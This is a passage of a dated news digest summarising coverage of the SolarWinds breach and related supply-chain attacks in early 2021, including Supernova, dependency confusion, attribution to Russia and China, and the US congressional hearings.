According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.
_______________________________________________________________________________________
(March 8, 2021)
‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US
Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify SolarWinds' retaliation is one that the US also violates with its own cyberespionage. And there's still no evidence that Russia's hacking, in this case, went beyond stealthy intelligence gathering of the sort the US performs routinely around the world.
_______________________________________________________________________________________
(March 8, 2021)
Hackers who hid Supernova malware in SolarWinds Orion linked to China
Intrusion activity related to the Supernova malware, that was planted on compromised SolarWinds Orion installations exposed on the public internet, points to an espionage threat actor based in China. Security researchers named this hacker group ‘Spiral’ and correlated findings from two intrusions in 2020 on the same victim network to determine activity from the same intruder.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 8, 2021)
SolarWinds Breach: Supernova malware linked to a China-based threat group
Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.
Ref - ZDNet
_______________________________________________________________________________________
(March 8, 2021)
A supply chain attack is targeting the Python community with 4000 fake modules
A user has uploaded 3951 utterly bogus PyPI packages, the names of which resemble the near-miss domain names of several genuine Python Packages. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command that was intended to run when the package was installed, rather than when it was used.
Ref - Sophos
_______________________________________________________________________________________
(March 6, 2021)
This new type of supply-chain attack has serious consequences
A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.
Ref - Ars Technica
_______________________________________________________________________________________
(March 5, 2021)
A supply chain attack has breached multiple airlines
A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).
Ref - Threatpost
_______________________________________________________________________________________
(March 5, 2021)
Singapore is the latest victim of supply chain attack
An aviation IT company, that says it serves 90% of the world's airlines, has been breached in what appears to be a coordinated supply chain attack. Customers of at least four companies - Malaysia Airlines, Singapore Airlines, Finnair Airlines, and Air New Zealand - may have been affected by the incident.
Ref - Computer Weekly
_______________________________________________________________________________________
(March 5, 2021)
Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel
Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.
Ref - DarkReading
_______________________________________________________________________________________
(March 5, 2021)
SolarWinds: 30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities
Four exploits found in Microsoft’s Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their emails hacked, according to a report by KrebsOnSecurity. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.
Ref - The Verge
_______________________________________________________________________________________
(March 4, 2021)
Researchers disclosed additional malware linked to SolarWinds attackers
Researchers with Microsoft and FireEye found three new malware families (named as GoldMax, Sibot, and GoldFinder), which they said are used by the threat group behind the SolarWinds attack. Researchers have uncovered more custom malware that is being used by the threat group behind the SolarWinds attack.
Ref - Threatpost
_______________________________________________________________________________________
(March 3, 2021)
Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks
Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.
Ref - Threatpost
_______________________________________________________________________________________
(March 3, 2021)
SolarWinds breach showed increased sophistication of advanced threat actors
Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.
Ref - Infosecurity
_______________________________________________________________________________________
(March 2, 2021)
SolarWinds breach cost $3.5 million in expenses
SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.
Ref - Bleeping Computer
_______________________________________________________________________________________
(March 1, 2021)
Dependency Confusion is being used to create copycat packages
Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.
Ref - Sonatype
_______________________________________________________________________________________
(March 2, 2021)
The SolarWinds hack compromised NASA and FAA
In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.
Ref - Wired
_______________________________________________________________________________________
(February 25, 2021)
Microsoft now sharing CodeQL queries for scanning SolarWinds-like implants code
Microsoft has open-source CodeQL queries that developers can use to scan source code for malicious implants matching the SolarWinds supply-chain attack. To make sure the attackers did not modify their code, Microsoft created CodeQL queries that were used to scan their codebase for malicious implants matching the SolarWinds IOCs.
Ref - Bleeping Computer
_______________________________________________________________________________________
(February 25, 2021)
Security experts were blindsided by the SolarWinds attack
The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. It proved no match for the government agencies charged with defending against such things and brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.
Ref - Medium
_______________________________________________________________________________________
(February 25, 2021)
SolarWinds hackers take advantage of Amazon Elastic Compute Cloud
Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.
Ref - CRN
_______________________________________________________________________________________
(February 24, 2021)
SolarWinds breach is one of the biggest attacks ever - US Senate committee
The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.
Ref - Infosecurity
_______________________________________________________________________________________
(February 24, 2021)
More SolarWinds breach victims could still be undisclosed
Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players may have been penetrated by the SolarWinds breach. They are not forthcoming as other victims did, thus leaving policymakers and potential customers in the dark.
Ref - WSJ
_______________________________________________________________________________________
(February 24, 2021)
Important takeaways from the US Senate's hearing of SolarWinds breach
The Senate Intelligence Committee held its first public hearing on the SolarWinds hack and there are five key takeaways- fingers pointed to Russia as the hack's perpetrator and companies want the US to hold Russia accountable. Amazon was a no-show despite being invited, and lawmakers weren't happy about it. Lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats. A new law setting standards for breached companies could be on the horizon. In addition, the hearings showed cooperation between the government and industry.
Ref - Business Insider
_______________________________________________________________________________________
(February 24, 2021)
SolarWinds hackers targeted NASA and Federal Aviation Administration networks
Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.
Ref - TechCrunch
_______________________________________________________________________________________
(February 24, 2021)
There is substantial evidence of Russian involvement in SolarWinds breach
Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.
Ref - CNN
_______________________________________________________________________________________
(February 23, 2021)
SolarWinds attackers stayed for several months in FireEye's network
The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. The attacker wasn't alive every single day on their network, Kevin Mandia, CEO of FireEye told the US Senate Intelligence Committee in response to a question about the attack time frame on FireEye's network.
Ref - DarkReading
_______________________________________________________________________________________
(February 23, 2021)
Finding answers on the SolarWinds breach
Key senators and corporate executives warned at a hearing on SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.
Ref - The New York Times
_______________________________________________________________________________________
(February 23, 2021)
AWS infrastructure was used in SolarWinds hack
Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.
Ref - CRN
_______________________________________________________________________________________
(February 23, 2021)
Mandatory breach disclosure in wake of SolarWinds breach
Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating certain businesses to disclose some breaches to the federal government. Currently, there is no rule mandating a company like FireEye to disclose a breach to the federal government, even when national security is a concern.
Ref - SCMagazine
_______________________________________________________________________________________
(February 23, 2021)
There could be more tech firms besides SolarWinds - used to hack targets
The hackers used a variety of legitimate software and cloud hosting services to access the systems of nine federal agencies and 100 private companies. They used Amazon Web Services cloud hosting to disguise their intrusions as benign network traffic. Additionally, the hackers didn't use the malware planted in SolarWinds' Orion products to breach nearly a third of the victims. Instead, they had access to other hacking techniques, all of which investigators are still unraveling.
Ref - CNET
_______________________________________________________________________________________
(February 23, 2021)
Reasons why SolarWinds was so vulnerable to a hack
SolarWinds outsourced much of its software engineering to cheaper programmers overseas, even though that typically increases the risk of security vulnerabilities. For a while, in 2019, the update server’s password for SolarWinds network management software was reported to be “solarwinds123.” Russian hackers were able to breach SolarWinds own email system and lurk there for months.
_______________________________________________________________________________________
(February 23, 2021)
Biden administration preparing to sanction Russia for SolarWinds hacks
The Biden administration is preparing sanctions and other measures to punish Moscow for actions that go beyond the sprawling SolarWinds cyber espionage campaign to include a range of malign cyber activity and the near-fatal poisoning of a Russian opposition leader, said U.S. officials familiar with the matter.
_______________________________________________________________________________________
(February 23, 2021)
SolarWinds hack grabs senate spotlight
The Senate Intelligence Committee, led by Senator Mark Warner, will convene for the first public hearing on the attack, which was disclosed in December. It will hear testimony from Sudhakar Ramakrishna, the president, and chief executive officer of SolarWinds, and Microsoft Corp. President Brad Smith, in addition to Crowdstrike Holdings Inc. CEO George Kurtz and Kevin Mandia, CEO of FireEye Inc.
_______________________________________________________________________________________
(February 23, 2021)
The Anatomy of the SolarWinds attack chain
The compromise of identity and manipulation of privileged access was instrumental in the success of the SolarWinds attack. Researchers are trying to deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk.
_______________________________________________________________________________________
(February 23, 2021)
Top executives from SolarWinds, Microsoft, FireEye, CrowdStrike face Senate grilling
Top executives at Texas-based software company SolarWinds, digital giant Microsoft and cybersecurity firms FireEye and CrowdStrike are expected to defend their companies’ responses to a sprawling series of breaches blamed on Russian hackers when they face the U.S. Senate’s Select Committee on Intelligence.
_______________________________________________________________________________________
(February 22, 2021)
The U.S. House committee hearing on 'SolarWinds' hack
The U.S. House of Representatives’ Oversight and Homeland Security Committees will hold a joint hearing on 26 February on cybersecurity incidents including the attack targeting SolarWinds Orion Software. Top executives from SolarWinds Corp, FireEye Inc, and Microsoft Corp will testify at the hearing.
Ref - Reuters
_______________________________________________________________________________________
(February 22, 2021)
SolarWinds-like breach could have happened to anyone
In the first of several public appearances, the CEO of SolarWinds is publicly discussing the breach of his company's software two months after reports surfaced that multiple government agencies may have been breached through a backdoor vulnerability. His message to others: this could have happened to anyone.
Ref - FCW
_______________________________________________________________________________________
(February 22, 2021)
Lessons learned from SolarWinds breach
According to the CEO of SolarWinds, there are three lessons from the recent attack - the first one is how to improve the infrastructure security within the enterprise. The second is how to improve the build infrastructure within the enterprise. The third is, how to improve software development processes and life cycles to the point where they essentially evolve to become secure development lifecycle processes.
Ref - CSIS.org
_______________________________________________________________________________________
(February 22, 2021)
SolarWinds hackers continued attacking Microsoft until January
The SolarWinds hackers continued efforts to infiltrate Microsoft until early January, keeping up the assault even after Microsoft revealed its source code had been compromised. The hackers lost source repository access after Microsoft secured its compromised accounts, but the threat actor kept making unsuccessful attempts to regain access all the way until early January.
_______________________________________________________________________________________
(February 22, 2021)
Researchers expecting another SolarWinds attack
People are too reliant on technology like email to protect themselves with digital walls they’ve long outgrown. There will certainly be another SolarWinds until we remember the more fundamental question of “what does the attacker want?” and work to apply it on all possible platforms.
_______________________________________________________________________________________
(February 21, 2021)
National security adviser talks about vows for a quick response to SolarWinds hack
White House national security adviser Jake Sullivan said the White House has asked the intelligence community to do more work to sharpen the attribution made by the Trump administration. This includes details about how the hack occurred, the extent of the damage, and the scope and scale of the breach.
_______________________________________________________________________________________
(February 20, 2021)
Within weeks, the US will be prepared to take the first steps to respond to SolarWinds attacks
National security adviser Jake Sullivan has said that the US will be taking a series of steps to respond to the devastating SolarWinds cyber hack and hold accountable those responsible within a few weeks instead of months, as anticipated earlier. The Biden administration is focused on identifying more precisely the culprit behind the suspected Russian spying campaign that targeted at least nine federal agencies and at least 100 private-sector businesses.
_______________________________________________________________________________________
(February 19, 2021)
SolarWinds hackers had access to Microsoft source code
The hackers behind the worst intrusion of U.S. government agencies in years won access to Microsoft’s secret source code for authenticating customers, potentially aiding one of their main attack methods. Microsoft had said before that the hackers had accessed some source code, but had not said which parts, or that any had been copied.
Ref - Reuters
_______________________________________________________________________________________
(February 19, 2021)
The scale of the SolarWinds breach is now visible
In a recent interview with CBS News’ 60 Minutes, Microsoft president Brad Smith answered many questions as to the scale of the attack and Microsoft’s unprecedented response to the incident. As to the scale, Smith and many others believe that the attack may have been the largest and most sophisticated the world has seen. Other reports estimate that 18,000 organizations may have been impacted by the attack.
Ref - PCrisk
_______________________________________________________________________________________
(February 18, 2021)
Microsoft recommends zero-trust architecture after SolarWinds attacks
The Microsoft Security Research Center, which has shared learnings and guidance throughout the Solorigate incident, confirmed that following the completion of their internal investigation they found no evidence that Microsoft systems were used to attack others. However, the tech firm recommended that organizations should deploy zero-trust architecture and defense-in-depth protection.
Ref - Microsoft
_______________________________________________________________________________________
(February 19, 2021)
SolarWinds hackers had access to Microsoft’s secret source code
The hackers behind the intrusion of U.S. government agencies had access to Microsoft’s secret source code for authenticating customers. Some of the code was downloaded, the company said, which would have allowed the hackers even more freedom to hunt for security vulnerabilities, create copies with new flaws, or examine the logic for ways to exploit customer installations.
Ref - Reuters
_______________________________________________________________________________________
(February 18, 2021)
Need of contact tracing approach after SolarWinds breach
According to researchers, the recent SolarWinds breach shows a need for a contact tracing approach for organizations to strengthen their own internal investigations. It can dramatically reduce the time it takes to discover how far an attacker has penetrated into their networks, and identify if other related systems in their supply chains, customers, and partner networks have also been compromised.
Ref - Fortune
_______________________________________________________________________________________
(February 18, 2021)
Microsoft pushes companies toward zero trusts after SolarWinds breach
Vasu Jakkal, Microsoft corporate vice president of security, compliance and identity, has said that none of Microsoft’s internal systems were used to attack others because of the zero trust approach followed by the company. The probe also found no evidence of access to Microsoft’s production services or customer data.
Ref - SC Media
_______________________________________________________________________________________
(February 18, 2021)
SolarWinds attackers downloaded Azure and Exchange source code
Microsoft announced that the SolarWinds hackers gained access to source code for a limited number of Azure, Intune, and Exchange components. For a small number of repositories, there was additional access, and downloading of component source code. These repositories contained code for a small subset of Azure components, Intune components, and Exchange components.
Ref - Bleeping Computer
_______________________________________________________________________________________
(February 18, 2021)
SolarWinds breach targeted 100 companies and took months of preparation
A White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise much more serious threat in the future. Anne Neuberger, deputy national security advisor for Cyber and Emerging Technology at the White House, said in a press briefing that nine government agencies were breached while many of the 100 private sector US organizations that were breached were technology companies.
Ref - ZDNet
_______________________________________________________________________________________
(February 18, 2021)
Efficacy of SolarWinds attack
The sheer sophistication of the SolarWinds incident is fascinating. At a technical level, it is a multilayered infiltration involving custom malicious tooling, backdoors, and cloaked code, far beyond the skill of script kiddies so often seen exploiting more obvious errors. In addition, it was carried out with code that looked completely benign.
Ref - DarkReading
_______________________________________________________________________________________
(February 18, 2021)
White House planning for an executive action after SolarWinds hack
In an update on the investigation into the SolarWinds supply chain attack, Deputy National Security Adviser Anne Neuberger said that the Biden administration is preparing "executive action" to address security shortcomings that have come to light. Neuberger, who was recently named coordinator of the investigation into the attack, made her comments at a White House press briefing.
Ref - BankInfoSecurity
_______________________________________________________________________________________
(February 18, 2021)
SolarWinds attackers studied Azure’s secret source code
The hackers behind the worst intrusion of U.S. government agencies in years gained access to Microsoft's secret source code for authenticating customers, one of the biggest vectors used in the attacks. Microsoft revealed that its internal investigation had found that the hackers studied parts of the source code instructions for its Azure cloud programs related to identity and security, its Exchange email programs, and Intune management for mobile devices and applications.
Ref - Dell
_______________________________________________________________________________________
(February 18, 2021)
Learnings for the financial services sector from the SolarWinds attacks
The SolarWinds cyber-attack includes some important lessons for financial services institutions of all sizes. A key factor in avoiding a SolarWinds-style breach is operational resilience, which itself depends on having the right strategy. It is crucial to validate the security controls in place and test how effective they are. For this, the financial firms need a SOC that understands the system and monitors the threats, including what type of cyber-attack would be a disaster for the business.
Ref - Consultancy
_______________________________________________________________________________________
(February 18, 2020)
The debate on retaliation to SolarWinds breach
Reports came under fire from many infosec professionals, who criticized arguments in favor of launching offensive cyberattacks, also known as hacking back, against SolarWinds breach adversaries. Many infosec experts have warned that hacking back carries enormous risk and should not be part of U.S. cybersecurity policy.
Ref - TechTarget
_______________________________________________________________________________________
(February 18, 2021)
Did SolarWinds hack include voice, video, and messaging platforms?
While investigations regarding SolarWinds are ongoing and new information is being revealed on a near-daily basis, there are some concerns regarding any role of an advanced persistent threat to Voice, Video, and Messaging Platforms in SolarWinds attacks. These platforms usually include SIP traffic, APIs Remote Access, and RTC, and are in heavy use since the advent of COVID-19 epidemic. So any threats to these platforms may lead to another level of catastrophe.
Ref - Medium
_______________________________________________________________________________________
(February 18, 2021)
Hacker behind SolarWinds used U.S. networks
A sprawling cyber-attack that compromised popular software created by Texas-based SolarWinds Corp. was executed from within the U.S, according to a top White House official. The hackers launched the hack from inside the United States which further made it difficult for the U.S. government to observe their activity.
Ref - Bloomberg
_______________________________________________________________________________________
(February 17, 2021)
An 82% increase observed in SolarWinds-style vendor email compromise attack
Abnormal Security, a next-generation cloud email security company, released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.
Ref - Yahoo
_______________________________________________________________________________________
(February 17, 2021)
There could be 1,000 developers who had written malicious code used in the SolarWinds breach
Microsoft discovered that the SolarWinds breach was not a job of a small group of threat actors, instead, 1,000+ developers had worked on developing the malicious code in the first place. This implied that the attack was not just widespread but was developed and executed by a larger group.
Ref - CISOMAG
_______________________________________________________________________________________
(February 17, 2021)
Around 100 private organizations hit by SolarWinds attack
The deputy national security advisor for cyber and emerging technology confirmed that so far nine federal agencies and 100 private industry organizations have been compromised in the SolarWinds attacks. In addition, the attackers waged the attack from inside the US, making it difficult for the US government to observe their activity.
Ref - DarkReading
_______________________________________________________________________________________
(February 17, 2021)
Risk of SolarWinds-style attacks through vendor email compromise increased 82%
Abnormal Security has released a new threat research report that reveals an 82% increase in the chance of companies getting attacked through SolarWinds-style vendor email compromise (VEC) during any given week. The company also found that these attacks can be very costly as it recently detected and stopped a $1.6M VEC attack.
_______________________________________________________________________________________
(February 16, 2021)
Importance of DNS security after SolarWinds breach
The SolarWinds attack underscores the importance of securing DNS traffic. DNS tunneling, where data is transmitted by appending it to recursive DNS queries, was chosen as the medium to steal customer data. Queries were sent to DNS command and control servers within the same region of breached enterprise networks to evade detection.
Ref - Akamai
_______________________________________________________________________________________
(February 16, 2021)
Webroot recommendations after the SolarWinds attack
Webroot is advising tips to their MSP and small business customers after the SolarWinds hack. It includes the use of security technology that includes threat intelligence for URLs, IP addresses, and files as a layered cybersecurity approach. Organizations should make sure to follow best practices within policies, and ensure devices are set to block high-risk and suspicious objects based on real-time intelligence criteria. Also, consider adding DNS Protection to your technology stack to deepen your protection around malicious IP addresses and URLs that are frequently used in attacks.
_______________________________________________________________________________________
(February 16, 2021)
Analysis of SUNBURST malware
The analysis of SUNBURST malware by FireEye disclosed that: attackers hid malicious code within thousands of lines of legitimate code, compiled inside of digitally signed binaries. Attackers took advantage of a platform SolarWinds Orion for lateral movement traffic. They disabled dozens of endpoint security tools, including FireEye, and used DNS for Stage 1 and 2 C2 communications. They also introduced minimal custom malware into the environment post-exploitation, often “living off the land” via native Windows tools.
Ref - FireEye
_______________________________________________________________________________________
(February 16, 2021)
A new type of supply-chain attack hit MNCs including Apple and Microsoft
Security researcher Alex Birsan has unveiled a new technique called Dependency Confusion or namespace confusion attack, that can execute counterfeit code on networks belonging to some of the popular enterprise giants, including Apple, Microsoft, and Tesla. By giving the submissions the same package name as dependencies used by companies, Birsan was able to get these companies to download and install the counterfeit code, which could result in a SolarWinds-type supply chain attack.
_______________________________________________________________________________________
(February 16, 2021)
A SolarWinds-like cyberattack targeted Centreon, French researchers disclose
French cybersecurity authorities have disclosed a SolarWinds-like supply-chain attack targeting several major organizations by hackers by compromising the Centreon enterprise IT platform. The first evidence of the intrusion campaign dates back to 2017 with the attack lasting until 2020. This mostly affected IT providers, in particular, web hosting providers.
_______________________________________________________________________________________
(February 16, 2021)
Microsoft reveals new details about sophisticated mega-breach
Microsoft has made some new revelations regarding SolarWinds attacks, which is calling the cyber-attack the most sophisticated of all time. According to Brad Smith, Microsoft has hired 500 engineers to dig into the attack. Cyjax CISO Ian Thornton-Trump points out that attackers had one chance to get the malware into place to do its thing without revealing their compromise. Because if a build failed because of the malicious code, their sinister plot to infect Orion would be revealed.
_______________________________________________________________________________________
(February 15, 2021)
Many SolarWinds customers failed to secure even after the breach came to light
Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach. RiskRecon, a firm specialized in risk assessment, observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) in response to the breach.
Ref - SecurityWeek
_______________________________________________________________________________________
(February 15, 2021)
Microsoft found 1,000-plus developers' fingerprints on the SolarWinds hack
Microsoft president Brad Smith says that their analysis of the SolarWinds hack suggests the code behind the crack was the work of a thousand or more developers. Smith didn’t say who those 1,000 developers worked for but compared the SolarWinds hack to attacks on Ukraine that had been widely attributed to Russia.
Ref - The Register
_______________________________________________________________________________________
(February 15, 2021)
SolarWinds hack is the largest and most sophisticated attack ever - Microsoft’s President
A hacking campaign that used a U.S. tech company as a springboard to compromise a raft of U.S. government agencies is the largest and most sophisticated attack the world has ever seen, according to Microsoft Corp’s president Brad Smith. The SolarWinds breach could have compromised up to 18,000 SolarWinds customers that used the company’s Orion network monitoring software. It could take months to identify the compromised systems and expel the hackers.
Ref - Reuters
_______________________________________________________________________________________
(February 14, 2021)
How Russian spies hacked the US federal agencies during SolarWinds attacks
Brad Smith, the president of Microsoft, has said that by looking at the sophistication of the SolarWinds attacks, it can be said that the attacker had an asymmetric advantage for somebody playing offense. And it is almost certainly possible that these attacks are still continuing. Kevin Mandia, CEO of FireEye, disclosed that intruders impersonated its employees snooping around inside their network, stealing FireEye's proprietary tools to test its client’s defenses and intelligence reports on active cyber threats.
_______________________________________________________________________________________
(February 14, 2021)
The SolarWinds attack could be still ongoing
The SolarWinds attack was unprecedented in audacity and scope and the Russian spies went rummaging through the digital files of the U.S. departments of Justice, State, Treasury, Energy, and Commerce. For nine months, they had unfettered access to top-level communications, court documents, even nuclear secrets. And by all accounts, it's still going on and hackers could still be stealing information.
Ref - CBS News
_______________________________________________________________________________________
(February 14, 2021)
The U.S. must strike back after SolarWinds breach
James Lewis, a director at the Center for Strategic and International Studies, said fear of escalation has held the U.S. back from punishing Russia, and other nation-states when they step out of line. He suggested the U.S. experiment with tactics to find creative ways of inflicting revenge on Russia.
Ref - CBS News
_______________________________________________________________________________________
(February 12, 2021)
CISOs' 2021 priorities after SolarWinds attack
After the SolarWinds attack, CISOs will need to redraw contracts with third-party providers for software, hardware, and services to explicitly demand that the providers have a commitment to securing their own environments. This includes ensuring they use third-party static code analysis, regular security scanning of local and cloud-based environments, DevSecOps, and integrity check of codes. In addition, they must adopt the latest encryption and authentication technologies.
Ref - TechTarget
_______________________________________________________________________________________
(February 12, 2021)
US Court system is demanding a change into court documents storage after SolarWinds breach
Multiple U.S. senators have demanded a hearing on what court officials know about the hackers' access to sensitive filings. A number of courthouses are now uploading documents to a single computer. All 13 of the country's federal circuit courts have separate measures and rules they take to protect the security of documents filed, but now everything may need to change due to the attack.
Ref - TechRepublic
_______________________________________________________________________________________
(February 12, 2021)
Orion servers exposed to Internet drop by 25% since SolarWinds breaches
One in four SolarWinds Orion servers exposed to the internet at the time of an era-defining espionage campaign has been taken off the internet. This could mean different things to different companies. Some may have put the servers inside of a firewall. Others may have found a replacement for SolarWinds. Yet others may have deactivated the servers during remediation.
_______________________________________________________________________________________
(February 12, 2021)
Russians outsmarted DHS cyberattack detection program in SolarWinds hack
From a software engineering perspective, the SolarWinds attack is probably the largest and most sophisticated attack the world has ever seen. The alleged Russian attackers had huge resources at their disposal, and probably more than 1,000 engineers worked on these attacks.
_______________________________________________________________________________________
(February 11, 2021)
Unanswered questions about SolarWinds breach
There is a considerable fear that the attackers behind the SolarWinds breach may have gained deep, persistent, and almost undetectable access on networks belonging to numerous organizations in sectors including manufacturing, industrial, construction, and logistics. The incident also resurfaced old concerns over supply chain vulnerabilities and some new ones over the ability of even the best security tools and controls to detect highly targeted attacks.
Ref - DarkReading
_______________________________________________________________________________________
(February 11, 2021)
New stats about suspicious network activity during peak of SUNBURST attack
ExtraHop threat researchers have found that between late March 2020 and early October 2020, detections of probable malicious activity increased by approximately 150 percent. Activity patterns outlined in the report indicate that the SUNBURST attackers were successful in flying under the radar of these detection methods either by disabling them or by redirecting their approach before they could be detected.
_______________________________________________________________________________________
(February 11, 2021)
How suspected Chinese hackers compromised USDA’s National Finance Center
Chinese hackers exploited a disparate SolarWinds hack from the one exploited by Russian hackers to compromise the National Finance center under the U.S. Department of Agriculture (USDA). It is said that the suspected Chinese hacking incident affected only a single customer and that a security update was released in December 2020.
_______________________________________________________________________________________
(February 10, 2021)
Maritime facilities using SolarWinds are ordered to report breaches
The U.S. Coast Guard (USCG) has ordered MTSA-regulated facilities and vessels using SolarWinds software for critical functions to report security breaches in case of suspicions of being affected by the SolarWinds supply-chain attack. USCG's order was delivered through a Marine Safety Information Bulletin published on continued awareness regarding the ongoing exploitation of SolarWinds software.
Ref - Bleeping Computer
_______________________________________________________________________________________
(February 10, 2021)
A senior official is leading the inquiry into SolarWinds breach
The White House has announced that it has put a senior national security official in charge of the response to the broad Russian breach of government computers, only hours after the Democratic chairman of the Senate Intelligence Committee criticized the disjointed and disorganized response in the opening weeks of the Biden administration.
Ref - The New York Times
_______________________________________________________________________________________
(February 10, 2021)
SolarWinds breach showed that the U.S. is most targeted and vulnerable
The U.S. is one of the most advanced, if not the most advanced cyber superpower in the world, but it’s also most targeted and it’s most vulnerable. Part of the problem is that the U.S. has spent more energy on hacking other countries than on defending itself. This attack has hit the Department of Homeland Security — the very agency charged with keeping the US safe.
Ref - NPR
_______________________________________________________________________________________
(February 10, 2021)
More cyberattacks like SolarWinds could be expected from Russia
The federal government's former top cybersecurity official warned lawmakers that the SolarWinds Orion hack is likely not the worst attack the United States may see from Russia. The federal agencies investigating the attack as well as third-party cybersecurity experts have largely concurred the breach appears to be espionage.
Ref - FCW
_______________________________________________________________________________________
(February 10, 2021)
SolarWinds breach put the spotlight on supply chain attacks
The recent SolarWinds breach has proved how devastating a well-executed supply chain attack could be. The thing that sets this apart from other cases, is its peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached around 18,000 customers and stayed inside targeted victim’s networks for months without raising any alarms.
Ref - CSO
_______________________________________________________________________________________
(February 10, 2021)
Security of supply chains is actually worse than everyone thinks
There are several reasons that indicate that the security of supply chains is a worse state. Several enterprise networks consist of an untold number of disparate products, duct-taped together through poorly documented interfaces. Most have no clue they're sitting ducks for average attackers of moderate skill, much less nation state-backed adversaries with unlimited resources.
Ref - ZDNet
_______________________________________________________________________________________
(February 9, 2021)
The encryption backdoor from 2015 could be behind the SolarWinds attacks
While it is still not clearly known how hackers altered the code of SolarWinds software, many point to the Juniper Networks 2015 incident as a precursor to the recent hack. In a letter addressed to the NSA, members of Congress questioned whether the agency knew about the encryption backdoor in the Juniper Networks products.
_______________________________________________________________________________________
(February 9, 2021)
Lessons from SolarWinds attack for federal agencies
There are several lessons for the Federal agencies to take away from the recent SolarWinds attacks. This includes making sure of response that actually reduces risk (turning off security updates and patches won’t). It also makes sense to choose reputable, responsive suppliers that adhere to security standards and best practices. In addition, follow the least privilege and Zero Trust policy and protect sensitive data with adequate protection.
Ref - Varonis
_______________________________________________________________________________________
(February 9, 2021)
The U.S. must prioritize cybersecurity after the SolarWinds breach
